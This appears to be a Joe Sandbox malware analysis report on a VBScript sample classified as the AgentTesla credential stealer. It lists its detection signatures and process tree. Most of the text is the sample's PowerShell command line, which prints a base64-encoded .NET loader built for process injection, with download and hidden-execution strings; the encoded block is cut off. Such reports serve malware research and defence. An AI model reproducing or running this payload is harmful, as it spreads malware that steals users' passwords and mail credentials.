Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GJ890-1286.vbs

Overview

General Information

Sample Name:GJ890-1286.vbs
Analysis ID:830445
MD5:b73f50ff5bacd275282b43778180fd8e
SHA1:98d820b8a51989b2bf9e9982de31eccf47a54fba
SHA256:2dbfb717c5e54b04e5e174bc6e62f90c1609adeb52085a9d42184aadac74bf0f
Tags:vbs
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
VBScript performs obfuscated calls to suspicious functions
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4464 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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AQAAASkADAcBAAABKwBOBwEAAAEtAGAHAQAAAS8AgAQCAAABMQAiBwEAAAEzAIAAAQAEgAAAAQAAAAAAAAAAAAAAAADSBAAACgAAAAAAAAAAAAAAoQFbAAAAAAAEAAAAAAAAAAAAAACqATMEAAAAAAQAAAAAAAAAAAAAAKoBUgAAAAAAAAAAAAEAAAAcBgAADAAEAA0ABAAOAAgADwAIAAAAEAAaAFAAAAAQAEkAUAAAAAAASwBQACMAkgEjAJwBAAAAAABBYDEAQ29udGV4dFZhbHVlYDEAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4AEEAQgBDAEQARQBWQUkAUUJYdFgAUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAR2V0UHJvY2Vzc0J5SWQAUmVzdW1lVGhyZWFkAFN5bmNocm9uaXplZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUASG9tZQBWYWx1ZVR5cGUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3VwcHJlc3NVbm1hbmFnZWRDb2RlU2VjdXJpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAGdldF9TaXplAFNpemVPZgBOZXdMYXRlQmluZGluZwBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE9wdGljYWwATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABGaWJlci5kbGwAS2lsbABTeXN0ZW0AQm9vbGVhbgBWZXJzaW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBaZXJvAFN0YXJ0dXAAc3RhcnR1cABGaWJlcgBCdWZmZXIAUmVzb3VyY2VNYW5hZ2VyAFVzZXIAQml0Q29udmVydGVyAENvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAEdldEJ5dGVzAFN0cmlu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